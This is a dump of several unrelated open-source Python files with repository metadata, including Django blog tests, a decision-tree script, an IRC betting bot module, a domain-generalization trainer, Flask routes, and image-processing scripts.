        self.assertEqual(response.status_code, 200) # the HTTP status code of the response.
        # 1.3. The page title is 'Blog'.
        soup = BeautifulSoup(response.content, 'html.parser') # BeautifulSoup analyzes the page; the parser does the actual work
self.assertEqual(soup.title.text, 'Blog')
self.navbar_test(soup)
self.category_test(soup)
        # 3.3. The main-area contains the titles of the three posts.
        main_area = soup.find('div', id="main-area")
        # 3.4. The phrase '아직 게시물이 없습니다.' ("no posts yet") no longer appears.
self.assertNotIn('아직 게시물이 없습니다.', main_area.text)
post_001_card = main_area.find('div', id='post-1')
self.assertIn(self.post_001.title, post_001_card.text)
self.assertIn(self.post_001.category.name, post_001_card.text)
self.assertIn(self.tag_hello.name, post_001_card.text)
self.assertNotIn(self.tag_python.name, post_001_card.text)
self.assertNotIn(self.tag_python_kor.name, post_001_card.text)
post_002_card = main_area.find('div', id='post-2')
self.assertIn(self.post_002.title, post_002_card.text)
self.assertIn(self.post_002.category.name, post_002_card.text)
self.assertNotIn(self.tag_hello.name, post_002_card.text)
self.assertNotIn(self.tag_python.name, post_002_card.text)
self.assertNotIn(self.tag_python_kor.name, post_002_card.text)
post_003_card = main_area.find('div', id='post-3')
self.assertIn(self.post_003.title, post_003_card.text)
self.assertIn('미분류', post_003_card.text)
self.assertNotIn(self.tag_hello.name, post_003_card.text)
self.assertIn(self.tag_python.name, post_003_card.text)
self.assertIn(self.tag_python_kor.name, post_003_card.text)
self.assertIn(self.user_james.username.upper(), main_area.text)
self.assertIn(self.user_trump.username.upper(), main_area.text)
        # When no posts exist at all
        Post.objects.all().delete()
        self.assertEqual(Post.objects.count(), 0)
        # 1.1. Fetch the post list page.
        response = self.client.get('/blog/') # holds the response for the requested list page; 200 means it worked
        # 1.2. The page loads normally.
        self.assertEqual(response.status_code, 200) # the HTTP status code of the response.
        # 1.3. The page title is 'Blog'.
        soup = BeautifulSoup(response.content, 'html.parser')
        # 2.2. The main area shows the message "아직 게시물이 없습니다." ("no posts yet").
        main_area = soup.find('div', id="main-area") # find locates a tag
self.assertIn('아직 게시물이 없습니다.', main_area.text)
    # Test code for the post detail page
    def test_post_detail(self):
        # 1.1. There is a Post.
post_000 = Post.objects.create(
title='첫 번째 포스트 입니다.',
content='Hello world. We are the world',
author=self.user_james,
category=self.category_culture,
)
        # 1.2. That post's URL is '/blog/1/'.
self.assertEqual(self.post_001.get_absolute_url(), '/blog/1/')
        # 2. Test the first post's detail page
        # 2.1. Accessing the first post's URL works normally (status_code = 200)
response = self.client.get(self.post_001.get_absolute_url())
self.assertEqual(response.status_code, 200)
soup = BeautifulSoup(response.content, 'html.parser')
self.navbar_test(soup)
self.category_test(soup)
        # 2.3. The first post's title appears in the browser tab title.
self.assertIn(self.post_001.title, soup.title.text)
        # 2.4. The first post's title appears in the post area (post_area).
main_area = soup.find('div', id="main-area")
post_area = main_area.find('div', id="post-area")
self.assertIn(self.post_001.title, post_area.text)
self.assertIn(self.category_programming.name, post_area.text)
self.assertIn(self.tag_hello.name, post_area.text)
self.assertNotIn(self.tag_python.name, post_area.text)
self.assertNotIn(self.tag_python_kor.name, post_area.text)
        # 2.5. The first post's author appears in the post area.
        # (was not implementable at first)
self.assertIn(self.user_james.username.upper(), post_area.text)
        # 2.6. The first post's content appears in the post area.
self.assertIn(self.post_001.content, post_area.text)
| devMooon/internet-programming | 과제/10주차/컴퓨터공학전공20200675문서연_tests.py | 컴퓨터공학전공20200675문서연_tests.py | py | 11,826 | python | ko | code | 0 | github-code | 1 | [
{
"api_name": "django.test.TestCase",
"line_number": 15,
"usage_type": "name"
},
{
"api_name": "django.test.Client",
"line_number": 18,
"usage_type": "call"
},
{
"api_name": "django.contrib.auth.models.User.objects.create_user",
"line_number": 19,
"usage_type": "call"
}... |
10604830299 | from datetime import datetime
def compare_dateprices(dp_a, dp_b, initial=True):
date_a, date_b = dp_a[0], dp_b[0]
if initial:
best_dp = dp_a if date_a <= date_b else dp_b
else:
best_dp = dp_a if date_a > date_b else dp_b
return best_dp
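# Added note: the (date, price) tuples are compared by date only; initial=True
# keeps the earliest pair (ties favour dp_a), initial=False keeps the latest
# (ties favour dp_b).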
if __name__ == "__main__":
date1 = datetime.strptime("2000-01-01", "%Y-%m-%d").date()
date2 = datetime.strptime("2000-01-01", "%Y-%m-%d").date()
dp1 = (date1, 100)
dp2 = (date2, 200)
best_dp = compare_dateprices(dp1, dp2, initial=False)
print(best_dp)
| sullyD64/bigdata-2019 | project1/src/spark/misc/tests.py | tests.py | py | 552 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "datetime.datetime.strptime",
"line_number": 16,
"usage_type": "call"
},
{
"api_name": "datetime.datetime",
"line_number": 16,
"usage_type": "name"
},
{
"api_name": "datetime.datetime.strptime",
"line_number": 17,
"usage_type": "call"
},
{
"api_name"... |
26398264145 | from copy import deepcopy
from utils import *
from test import test_all
from c45 import max_gain
import numpy as np
import matplotlib.pyplot as plt
from sklearn.metrics import roc_curve, precision_recall_curve
def build_tree(T):
"""
An entry point in C45 algorithm.
_T_ - a two-dimensional array representing data table in the following format:
[
['<class value>', '<param1>', '<param2>', ...],
['<class value>', '<param1>', '<param2>', ...],
['<class value>', '<param1>', '<param2>', ...],
...
]
Returns the tree in array format.
"""
col = max_gain(T)
if col == None:
return {'value': get_major_class(T), 'key': 'leaf'}
tree = []
subtables = table_partition(T, col)
for subtable in subtables:
v = subtable[0][col]
if is_one_classed(subtable):
tree.append({'attr': col, 'value': v, 'class': subtable[0][0], 'chance': 1, 'count': len(subtable)})
else:
subtable = del_col(subtable, col)
subtree = build_tree(subtable)
if subtree['key'] == 'leaf':
tree.append({'attr': col, 'value': v, 'class': subtree['value'][0], 'chance': subtree['value'][1], 'count': subtree['value'][2]})
else:
tree.append({'attr': col, 'value': v, 'class': False, 'childs': subtree['value']})
return {'value': tree, 'key': 'tree'}
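def _example_build_tree():
    # Hedged usage sketch, not part of the original lab code: the rows below are
    # invented, following the documented format ['<class value>', '<param1>', ...].
    example_table = [
        ['yes', 'sunny', 'hot'],
        ['no', 'rainy', 'hot'],
        ['yes', 'sunny', 'cool'],
        ['no', 'rainy', 'cool'],
    ]
    return build_tree(example_table)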
names = read_attributes()
def plot_roc_curve(true_y, y_prob):
"""
    plots the ROC curve based on the predicted probabilities
"""
fpr, tpr, thresholds = roc_curve(true_y, y_prob)
plt.plot(fpr, tpr)
plt.xlabel('False Positive Rate')
plt.ylabel('True Positive Rate')
plt.show()
def plot_pr_curve(true_y, y_prob):
precision, recall, thresholds = precision_recall_curve(true_y, y_prob)
plt.plot(recall, precision)
plt.xlabel("Recall")
plt.ylabel("Percision")
plt.show()
if __name__ == '__main__':
    # Read the data and the attributes from the file
table, rand_list = read_file()
test_table = deepcopy(table)
    # Build the decision tree
tree = build_tree(table)['value']
    # Get a table with the class and the number of objects in that class at each step
roc_table = collect_chances(tree)
y = np.array([])
y_prob = np.array([])
for row in roc_table:
y = np.append(y, [row['class']] * row['count'])
y_prob = np.append(y_prob, [row['chance']] * row['count'])
plot_pr_curve(y, y_prob)
plt.close()
plot_roc_curve(y, y_prob)
test_all(tree, test_table) | buffer404/university | year3/Artificial intelligence systems/lab3/main.py | main.py | py | 2,684 | python | en | code | 1 | github-code | 1 | [
{
"api_name": "c45.max_gain",
"line_number": 24,
"usage_type": "call"
},
{
"api_name": "sklearn.metrics.roc_curve",
"line_number": 53,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot.plot",
"line_number": 54,
"usage_type": "call"
},
{
"api_name": "matplot... |
17599914288 | import json
useDebugPrint = False
class Bets():
def __init__(self, bot, chatpointsObj, chateventsObj, jsonpath):
self.bot = bot
self.chatpointsObj = chatpointsObj
self.chateventsObj = chateventsObj
self.jsonpath = jsonpath
self.bets = {}
try:
with open(self.jsonpath, 'r+') as file:
storedBets = json.load(file).get('bets', {})
for key in storedBets.keys():
self.bets[key] = Bet(key, '', '')
self.bets[key].recoverFromDict(storedBets[key])
except Exception:
pass
def count(self):
return len(self.bets.keys())
def asStrings(self):
return [self.bets[key].asString() for key in self.bets.keys()]
def createBet(self, name, description, channel='#shadows'):
        if self.betExists(name):
            return False
        self.bets[name] = Bet(name, description, channel)
        return True  # make the success case explicit instead of implicitly returning None
    def betExists(self, name):
        return name in self.bets
def closeBet(self, name):
if self.betExists(name):
return self.bets.get(name).closeBet(self)
return False
def addOptions(self, name, TEXT):
if self.betExists(name):
return self.bets.get(name).addOptions(self, TEXT)
return False
def addBet(self, name, channel, optionname, id, points, allpoints=False, printInChat=True):
if self.betExists(name):
return self.bets.get(name).addBet(self, channel, optionname, id, points, allpoints, printInChat)
return False
def reset(self):
self.bets = {}
def endBet(self, name, winningoption):
reply = False
if self.betExists(name):
            reply = self.bets.get(name).endBet(self, winningoption)
            del self.bets[name]  # deleting the entry is enough; no need to overwrite it first
return reply
def save(self, path=False):
if not path:
path = self.jsonpath
with open(path, 'w+') as file:
bets = {key: self.bets[key].__dict__ for key in self.bets.keys()}
json.dump({'bets': bets}, file, indent=2)
file.close()
def getFilePath(self):
return self.jsonpath
class Bet():
def __init__(self, name, description, channel):
self.name = name
self.chatpointsDefaultKey = 'p'
self.chatpointsReservedKey = 'chatbet-reserved'
self.chatpointsStatisticsKey = 'chatbets'
self.channel = channel
self.gamecostreceiver = 'MAI'
self.description = description
self.options = {}
self.openForBets = True
def recoverFromDict(self, dct):
self.name = dct.get('name')
self.chatpointsDefaultKey = dct.get('chatpointsDefaultKey')
self.chatpointsReservedKey = dct.get('chatpointsReservedKey')
self.chatpointsStatisticsKey = dct.get('chatpointsStatisticsKey')
self.channel = dct.get('channel')
self.gamecostreceiver = dct.get('gamecostreceiver')
self.description = dct.get('description')
self.options = dct.get('options')
self.openForBets = dct.get('openForBets')
def __debugPrint(self, text):
if useDebugPrint:
print(text.encode('ascii', errors='backslashreplace'))
def __outputToChat(self, main, channel, msg, ignore=False):
if ignore:
return
self.__debugPrint(channel + ': ' + msg)
main.bot.privmsg(channel, msg)
def __addOptionIfNecessary(self, optionname):
if not self.options.get(optionname, False):
self.__debugPrint('adding option: ' + optionname)
self.options[optionname] = {}
def __addPlayerToOption(self, optionname, id, points):
if points <= 0:
return
self.__addOptionIfNecessary(optionname)
self.options[optionname][id] = self.options[optionname].get(id, 0) + points
def __reservePlayerPoints(self, main, name, points, partial):
return main.chatpointsObj.transferBetweenKeysById(name, self.chatpointsDefaultKey, self.chatpointsReservedKey, points, partial=partial)
def closeBet(self, main):
self.openForBets = False
def addOptions(self, main, TEXT):
for option in TEXT.lower().replace(",", " ").split():
if len(option) >= 1:
self.__addOptionIfNecessary(option)
def asString(self):
optionStrings = [key + " (" + format(sum(self.options[key].values()), '.1f') + ")" for key in self.options.keys()]
return self.name + ": " + self.description + " [" + ", ".join(optionStrings) + "]"
def addBet(self, main, channel, optionname, id, points, allpoints, printInChat):
self.__debugPrint('adding bet: ' + optionname + ', id=' + id + ', points=' + str(points) + ', allpoints=' + str(allpoints))
if not self.openForBets:
self.__outputToChat(main, channel, 'Betting is closed!')
return False
if optionname not in self.options.keys():
self.__outputToChat(main, channel, 'The selection option does not exist!')
return False
worked, amount = self.__reservePlayerPoints(main, id, points, partial=allpoints)
if worked:
self.__addPlayerToOption(optionname, id, amount)
if allpoints:
self.__outputToChat(main, channel, 'Noted! (' + format(amount, '.1f') + ' points)', ignore=(not printInChat))
else:
self.__outputToChat(main, channel, 'Noted!', ignore=(not printInChat))
return True
return False
def endBet(self, main, winningoption):
if (winningoption not in self.options.keys()):
return False
winning = {}
all = {}
for key in self.options.keys():
option = self.options[key]
if key == winningoption:
for name in option.keys():
winning[name] = winning.get(name, 0) + option[name]
all[name] = all.get(name, 0) + option[name]
else:
for name in option.keys():
all[name] = all.get(name, 0) + option[name]
winningpoints = sum(winning.values())
losingpoints = sum(all.values())
# first, all players send their lost points
for name in all.keys():
pointsLost = all[name]
dct = {name: pointsLost}
self.__debugPrint("Handling player " + name + ", sending " + str(pointsLost) + " points to gamecostreceiver")
main.chatpointsObj.transferByIds(self.gamecostreceiver, dct, receiverKey=self.chatpointsDefaultKey, giverKey=self.chatpointsReservedKey, allowNegative=False, partial=False)
main.chatpointsObj.transferByIds(self.gamecostreceiver, dct, receiverKey=self.chatpointsStatisticsKey, giverKey=self.chatpointsStatisticsKey, allowNegative=True, partial=False)
# then winners get their proportional parts back
for name in winning.keys():
pointsWon = (winning[name] / winningpoints) * losingpoints
pointsWon = int(pointsWon)
dct = {self.gamecostreceiver: pointsWon}
winning[name] = pointsWon
self.__debugPrint("Handling winner " + name + ", sending " + str(pointsWon) + " points from gamecostreceiver")
main.chatpointsObj.transferByIds(name, dct, receiverKey=self.chatpointsDefaultKey, giverKey=self.chatpointsDefaultKey, allowNegative=False, partial=False)
main.chatpointsObj.transferByIds(name, dct, receiverKey=self.chatpointsStatisticsKey, giverKey=self.chatpointsStatisticsKey, allowNegative=True, partial=False)
# stats
main.chateventsObj.addEvent(self.chatpointsStatisticsKey, {
'name': self.name,
'description': self.description,
'winners': winning,
'bets': all,
})
# inform players
for name in all.keys():
self.__outputToChat(main, name, 'The bet "{name}" finished, winning option was "{winningoption}"! Your points changed by {diff}, you have a total of {total} points now.'.format(**{
'name': self.name,
'winningoption': winningoption,
'diff': format(winning.get(name, 0) - all.get(name, 0), '.1f'),
'total': format(main.chatpointsObj.getById(name).get(self.chatpointsDefaultKey, 0), '.1f'),
}))
# inform channel
dct = {
'name': self.name,
'winningoption': winningoption,
'points': format(losingpoints, '.1f'),
'winnercount': str(len(winning.keys())),
'count': str(len(all.keys())),
}
if len(winning.keys()) >= 1:
self.__outputToChat(main, self.channel, 'The bet "{name}" finished, winning option was "{winningoption}"! {points} points are distributed to {winnercount} winners, from {count} participants!'.format(**dct))
else:
self.__outputToChat(main, self.channel, 'The bet "{name}" finished, winning option was "{winningoption}"! Nobody won any of the {points} points!'.format(**dct))
return True
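def _example_payout_math():
    # Hedged worked example of the payout rule in Bet.endBet (numbers invented):
    # stakes of 30 and 10 on the winning option out of a 100-point pot pay out
    # int(30/40 * 100) = 75 and int(10/40 * 100) = 25 respectively.
    winning = {'alice': 30, 'bob': 10}
    pot = 100
    winningpoints = sum(winning.values())
    return {name: int(stake / winningpoints * pot) for name, stake in winning.items()}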
| Petricpwnz/NyAI | modules/bet.py | bet.py | py | 9,192 | python | en | code | 1 | github-code | 1 | [
{
"api_name": "json.load",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "json.dump",
"line_number": 67,
"usage_type": "call"
}
] |
1374574117 | import torch
from tqdm import tqdm
from tabulate import tabulate
from collections import OrderedDict
from torch.nn import functional as F
from HDG.engine.trainer import GenericNet
from HDG.utils import count_num_parameters, evaluator, TripletLoss
from HDG.engine import TRAINER_REGISTRY, GenericTrainer
from HDG.optim import build_optimizer, build_lr_scheduler
@TRAINER_REGISTRY.register()
class CrossGrad(GenericTrainer):
"""Cross-gradient training.
https://arxiv.org/abs/1804.10745.
"""
def __init__(self, cfg):
super().__init__(cfg)
self.eps_l = cfg.TRAINER.CROSSGRAD.EPS_L
self.eps_d = cfg.TRAINER.CROSSGRAD.EPS_D
self.alpha_l = cfg.TRAINER.CROSSGRAD.ALPHA_L
self.alpha_d = cfg.TRAINER.CROSSGRAD.ALPHA_D
def build_model(self):
print("Building Label Classifier")
self.label_classifier = GenericNet(self.cfg, self.num_classes)
self.label_classifier.to(self.device)
self.optimizer_label = build_optimizer(self.label_classifier, self.cfg.OPTIM)
self.scheduler_label = build_lr_scheduler(self.optimizer_label, self.cfg.OPTIM)
self.model_registration("label_classifier", self.label_classifier, self.optimizer_label, self.scheduler_label)
print("Building Domain Classifier")
self.domain_classifier = GenericNet(self.cfg, self.num_source_domains)
self.domain_classifier.to(self.device)
self.optimizer_domain = build_optimizer(self.domain_classifier, self.cfg.OPTIM)
self.scheduler_domain = build_lr_scheduler(self.optimizer_domain, self.cfg.OPTIM)
self.model_registration("domain_classifier", self.domain_classifier, self.optimizer_domain, self.scheduler_domain)
model_parameters_table = [
["Model", "# Parameters"],
["Label Classifier", f"{count_num_parameters(self.label_classifier):,}"],
["Domain Classifier", f"{count_num_parameters(self.domain_classifier):,}"]
]
print(tabulate(model_parameters_table))
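    # Comment added for clarity: CrossGrad trains each network on inputs perturbed
    # along the gradient of the *other* network's loss. The label classifier sees
    # domain-perturbed inputs and the domain classifier sees label-perturbed
    # inputs; forward_backward below implements exactly this exchange.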
def forward_backward(self, batch_data):
input_data, class_label, domain_label = self.parse_batch_train(batch_data)
input_data.requires_grad = True
# Compute Domain Perturbation
loss_domain = F.cross_entropy(self.domain_classifier(input_data), domain_label)
loss_domain.backward()
grad_domain = torch.clamp(input_data.grad.data, min=-0.1, max=0.1)
input_data_domain_perturb = input_data.data + self.eps_l * grad_domain
# Compute Label Perturbation
input_data.grad.data.zero_()
loss_label = F.cross_entropy(self.label_classifier(input_data), class_label)
loss_label.backward()
grad_label = torch.clamp(input_data.grad.data, min=-0.1, max=0.1)
input_data_label_perturb = input_data.data + self.eps_d * grad_label
input_data = input_data.detach()
# Update Label Classifier
triplet_loss = TripletLoss(margin=1.2)
output_original, representations_original = self.label_classifier(input_data, return_feature=True)
output_domain_perturb, representations_domain_perturb = self.label_classifier(input_data_domain_perturb, return_feature=True)
loss_c1 = F.cross_entropy(output_original, class_label)
loss_c2 = F.cross_entropy(output_domain_perturb, class_label)
loss_t1 = triplet_loss(representations_original, class_label)
loss_t2 = triplet_loss(representations_domain_perturb, class_label)
loss_l = (1 - self.alpha_l) * (loss_c1 + loss_t1) + self.alpha_l * (loss_c2 + loss_t2)
self.model_backward_and_update(loss_l, "label_classifier")
# Update Domain Classifier
loss_d1 = F.cross_entropy(self.domain_classifier(input_data), domain_label)
loss_d2 = F.cross_entropy(self.domain_classifier(input_data_label_perturb), domain_label)
loss_d = (1 - self.alpha_d) * loss_d1 + self.alpha_d * loss_d2
self.model_backward_and_update(loss_d, "domain_classifier")
loss_summary = {
"loss_l": loss_l.item(),
"loss_d": loss_d.item()
}
if self.batch_index + 1 == self.num_batches:
self.update_lr()
return loss_summary
def parse_batch_train(self, batch_data):
input_data = batch_data["img"].to(self.device)
class_label = batch_data["class_label"].to(self.device)
domain_label = batch_data["domain_label"].to(self.device)
return input_data, class_label, domain_label
def model_inference(self, input_data):
return self.label_classifier(input_data)
def test(self):
print("Extracting Feature Representation for Query Set and Gallery Set")
self.set_model_mode("eval")
representations = OrderedDict()
class_names_labels = OrderedDict()
with torch.no_grad():
self.label_classifier.semantic_projector = None
for batch_index, batch_data in enumerate(tqdm(self.test_data_loader)):
file_names, input_data, class_names = self.parse_batch_test(batch_data)
outputs = self.model_inference(input_data)
outputs = outputs.cpu()
for file_name, representation, class_name in zip(file_names, outputs, class_names):
representations[file_name] = representation
class_names_labels[file_name] = class_name
dist_mat = evaluator.compute_dist_mat(representations, self.data_manager.test_dataset)
evaluator.evaluate(dist_mat, self.data_manager.test_dataset)
| VirtueZhao/HDGC | HDG/engine/baseline/CrossGrad.py | CrossGrad.py | py | 5,587 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "HDG.engine.GenericTrainer",
"line_number": 12,
"usage_type": "name"
},
{
"api_name": "HDG.engine.trainer.GenericNet",
"line_number": 27,
"usage_type": "call"
},
{
"api_name": "HDG.optim.build_optimizer",
"line_number": 29,
"usage_type": "call"
},
{
... |
17977945273 | from models.Project import Project
from main import db
from flask import Blueprint, request, render_template, redirect, url_for, flash
from flask_login import login_required, current_user
projects = Blueprint('projects', __name__, url_prefix='/projects')
@projects.route('/', methods=['GET'])
def project_index():
projects = Project.query.all()
# return jsonify(projects_schema.dump(projects))
return render_template("projects_index.html", projects=projects)
@projects.route('/', methods=['POST'])
@login_required
def project_create():
name = request.form.get('name')
link = request.form.get('link')
description = request.form.get('description')
new_project = Project()
new_project.name = name
new_project.link = link
new_project.description = description
new_project.user_id = current_user.id
db.session.add(new_project)
db.session.commit()
flash('Project Created!')
# return jsonify(project_schema.dump(new_project))
return redirect(url_for('projects.project_show', id=new_project.id))
@projects.route('/<int:id>', methods=['GET'])
def project_show(id):
project = Project.query.get(id)
# return jsonify(project_schema.dump(project))
return render_template("project.html", project=project)
@projects.route('/my_projects', methods=['GET'])
@login_required
def project_show_user():
projects = Project.query.filter_by(user_id=current_user.id)
# return jsonify(projects_schema.dump(projects))
return render_template("projects_user.html", projects=projects)
# @projects.route('/<int:id>', methods=['DELETE'])
@projects.route("/delete/<int:id>", methods=['GET'])
@login_required
def project_delete(id):
project = Project.query.filter_by(id=id, user_id=current_user.id).first()
if not project:
flash('Unauthorised to delete this project')
return redirect(url_for('projects.project_show', id=id))
db.session.delete(project)
db.session.commit()
flash('Project Deleted')
return redirect(url_for('projects.project_show_user'))
# @projects.route('/<int:id>', methods=['PUT', 'PATCH'])
@projects.route("/update/<int:id>", methods=['POST'])
@login_required
def project_update(id):
project = Project.query.filter_by(id=id, user_id=current_user.id).first()
if not project:
flash('Unauthorised to update this project')
return redirect(url_for('projects.project_show', id=id))
project.name = request.form.get('name')
project.link = request.form.get('link')
project.description = request.form.get('description')
db.session.commit()
flash('Project Updated')
# return jsonify(project_schema.dump(project))
return redirect(url_for('projects.project_show', id=id))
@projects.route("/new", methods=["GET"])
def new_project():
return render_template("new_project.html")
@projects.route("/revise/<int:id>", methods=["GET"])
def revise_project(id):
project = Project.query.get(id)
return render_template("revise_project.html", project=project)
| eric-chew/T4A2-B | src/controllers/projects_controller.py | projects_controller.py | py | 3,040 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "flask.Blueprint",
"line_number": 6,
"usage_type": "call"
},
{
"api_name": "models.Project.Project.query.all",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "models.Project.Project.query",
"line_number": 11,
"usage_type": "attribute"
},
{
... |
23164192729 | import geopandas as gp
import shapely
def intersection(left, right, grid_size=0):
"""Intersect the geometries from the left with the right.
New, intersected geometries are stored in "geometry_right".
Uses spatial index operations for faster operations. Wholly contained
geometries from right are copied intact, only those that intersect but are
not wholly contained are intersected.
Parameters
----------
left : GeoDataFrame
right : GeoDataFrame
    grid_size : int, optional (default: 0)
        if nonzero, geometries and results from intersection will be
snapped to this precision grid
Returns
-------
DataFrame or None
output geometries are in "geometry_right"
None if there are no intersections
"""
tree = shapely.STRtree(right.geometry.values)
ix = tree.query(left.geometry.values, predicate="intersects")
if len(ix[0]) == 0:
return None
# copy original geometries; they will be clipped below if needed
intersects = gp.GeoDataFrame(
{
"geometry": left.geometry.values.take(ix[0]),
"index_right": right.index.values.take(ix[1]),
"geometry_right": right.geometry.values.take(ix[1]),
},
index=left.index.take(ix[0]),
crs=left.crs,
)
shapely.prepare(intersects.geometry.values)
contains = shapely.contains_properly(
intersects.geometry.values, intersects.geometry_right.values
)
# clip any that are not fully contained
tmp = intersects[~contains]
intersects.loc[~contains, "geometry_right"] = shapely.intersection(
tmp.geometry.values, tmp.geometry_right.values, grid_size=grid_size
)
return left.join(intersects.drop(columns=["geometry"]), how="inner").join(
right.drop(columns=["geometry"]), on="index_right"
)
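def _example_intersection():
    # Hedged usage sketch, not part of the original module: two single-polygon
    # layers whose overlap is the unit square from (1, 1) to (2, 2).
    left = gp.GeoDataFrame({"geometry": [shapely.box(0, 0, 2, 2)]})
    right = gp.GeoDataFrame({"geometry": [shapely.box(1, 1, 3, 3)]})
    return intersection(left, right)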
| astutespruce/secas-blueprint | analysis/lib/geometry/intersection.py | intersection.py | py | 1,867 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "shapely.STRtree",
"line_number": 29,
"usage_type": "call"
},
{
"api_name": "geopandas.GeoDataFrame",
"line_number": 36,
"usage_type": "call"
},
{
"api_name": "shapely.prepare",
"line_number": 46,
"usage_type": "call"
},
{
"api_name": "shapely.contai... |
32308460282 | import os
from flask import jsonify, request
import requests
def getWeather():
try:
API_KEY = os.getenv("API_KEY")
args = request.args
lon = str(args.get('lon'))
lat = str(args.get('lat'))
url = f'https://api.openweathermap.org/data/2.5/weather?lat={lat}&lon={lon}&appid={API_KEY}'
response = requests.get(url).json()
return jsonify(response),200
    except Exception as e:
        raise Exception("Something bad happened") from e  # chain the original error instead of discarding it
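# Hedged usage sketch (route registration lives elsewhere in the app):
# GET /weather?lat=28.61&lon=77.21 -> proxies the OpenWeatherMap response as JSON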
{
"api_name": "os.getenv",
"line_number": 7,
"usage_type": "call"
},
{
"api_name": "flask.request.args",
"line_number": 8,
"usage_type": "attribute"
},
{
"api_name": "flask.request",
"line_number": 8,
"usage_type": "name"
},
{
"api_name": "requests.get",
"line... |
4836908083 | ##########################################
# @subject : Person segmentation #
# @author : perryxin #
# @date : 2018.12.27 #
##########################################
import torch.utils.data as Data
from read_data import *
from config import *
from models.unet_plusplus import *
from models.linknet import *
model_name = 'linknet' # 'unet++'
if model_name == 'unet++':
net = Unet_2D(3, 1, 'test')
checkpoint = torch.load("../models/weights/unet++_11.pth", map_location='cpu')
dataset_test = MyData(istrain="test", size=256)
else: # 'linknet'
net = LinkNet()
checkpoint = torch.load("../models/weights/link_640_57.pth", map_location='cpu')
dataset_test = MyData(istrain="test", size=640)
net.load_state_dict(checkpoint['net'])
loader_test = Data.DataLoader(dataset_test, batch_size=conf.BATCH_SIZE_TEST, shuffle=False)
net.cuda()
print("test_images", len(dataset_test))
print("start testing...")
# val###################
net.eval()
test_iou = 0
t1 = time.time()
for i, (img, label) in enumerate(loader_test):
    output = net(img.float().cuda())  # move the input onto the GPU to match the model
output[output >= 0.5] = 1.
output[output != 1] = 0.
iou_ = iou(output.cpu(), label)
test_iou += iou_
print("img_%d: iou=%.4f" % (i, iou_))
#############show
isShow = True
if isShow:
import matplotlib.pyplot as plt
plt.subplot(221)
        output = output[0, 0].detach().cpu().numpy()  # bring the tensor back to the CPU before numpy conversion
label = label[0, 0].numpy()
img = (img[0].permute(1, 2, 0).detach().numpy() * conf.std + conf.mean) # .detach().cpu()
img = img * 255
plt.imshow(np.uint8(img))
plt.title("origin")
plt.axis('off')
plt.xticks([])
plt.yticks([])
plt.subplot(222)
plt.imshow(label)
plt.title("label")
plt.axis('off')
plt.xticks([])
plt.yticks([])
plt.subplot(223)
mm = apply_mask(img, output, color=random_colors(1)[0])
# mm=cv2.addWeighted(np.uint8(img),0.8,np.uint8(output*255),0.2,0)
plt.imshow(np.uint8(mm))
plt.title("origin+seg")
plt.axis('off')
plt.xticks([])
plt.yticks([])
plt.subplot(224)
plt.imshow(output)
plt.title("seg")
plt.axis('off')
plt.xticks([])
plt.yticks([])
# plt.savefig("./results/imgs/img_%d.png"%i)
plt.show()
del img, label
test_iou /= len(loader_test)
t2 = time.time()
print("speed: %.4f fps, test_iou : %.4f" % (len(dataset_test) / (t2 - t1), test_iou))
| hellopipu/person_seg | test.py | test.py | py | 2,579 | python | en | code | 15 | github-code | 1 | [
{
"api_name": "torch.utils.data.load",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "torch.utils.data",
"line_number": 15,
"usage_type": "name"
},
{
"api_name": "torch.utils.data.load",
"line_number": 19,
"usage_type": "call"
},
{
"api_name": "torch.ut... |
39424860660 | import cv2
import io
import os
from google.cloud import vision
os.environ["GOOGLE_APPLICATION_CREDENTIALS"] = ".." #put your google API credintials here
# Instantiates a client
client = vision.ImageAnnotatorClient()
#folder = "/uploads/"
class Image():
def __init__(self):
self.labels = []
self.image = None
def capture(self):
        # capture frames until ESC is pressed; SPACE saves the current frame
        cam = cv2.VideoCapture(0)
        cv2.namedWindow("Camera")
        img_counter = 0
        img_name = None  # stays None if the user quits before capturing a frame
while True:
ret, frame = cam.read()
if not ret:
print("failed to grab frame")
break
cv2.imshow("test", frame)
k = cv2.waitKey(1)
if k % 256 == 27:
# ESC pressed
print("Escape hit, closing...")
break
elif k % 256 == 32:
# SPACE pressed
img_name = "opencv_frame_{}.png".format(img_counter)
cv2.imwrite(img_name, frame)
print("{} written!".format(img_name))
img_counter += 1
cam.release()
cv2.destroyAllWindows()
self.image = img_name
def capture_bis(self):
        # initialize the camera and grab a single frame
cam = cv2.VideoCapture(0) # 0 -> index of camera
s, img = cam.read()
img_counter = 0
if s: # frame captured without any errors
#namedWindow("cam-test", CV_WINDOW_AUTOSIZE)
#imshow("cam-test", img)
cv2.waitKey(0)
#destroyWindow("cam-test")
img_name = "opencv_frame_{}.png".format(img_counter)
cv2.imwrite(img_name, img) # save image
self.image = img_name
def findLabels(self):
# The name of the image file to annotate
file_name = self.image
# Loads the image into memory
with io.open(file_name, 'rb') as image_file:
content = image_file.read()
image = vision.Image(content=content)
# Performs label detection on the image file
response = client.label_detection(image=image)
labels = response.label_annotations
#self.labels = labels
print('Labels:')
for label in labels:
print(label.description+', score: '+str(label.score))
self.labels.append(label)
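# Hedged usage sketch (not in the original file):
#
#     img = Image()
#     img.capture_bis()   # grab a single frame from the default camera
#     img.findLabels()    # send it to the Vision API and collect the labels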
| yahyaakli/spring2021hackathon | src/Image.py | Image.py | py | 2,347 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "os.environ",
"line_number": 8,
"usage_type": "attribute"
},
{
"api_name": "google.cloud.vision.ImageAnnotatorClient",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "google.cloud.vision",
"line_number": 11,
"usage_type": "name"
},
{
"api_n... |
71291623714 | import gensim
from sklearn import svm
from sklearn import datasets
from sklearn.feature_extraction.text import TfidfVectorizer
from joblib import dump, load
import flask
from flask_restful import Resource, Api, reqparse
from flask import request
from functools import partial
from flask import request, jsonify
app = flask.Flask(__name__)
app.config["DEBUG"] = True
def k_means_sort(e, product_terms, query):
#global product_terms, query
occurences = 0
for word in [x.lower() for x in e.split(',')[1].split('-')]:
if word in product_terms or word in query.split(' '):
occurences += 1
occurences /= len(e.split(',')[1].split('-'))
average_similarity = 0
counter = 0
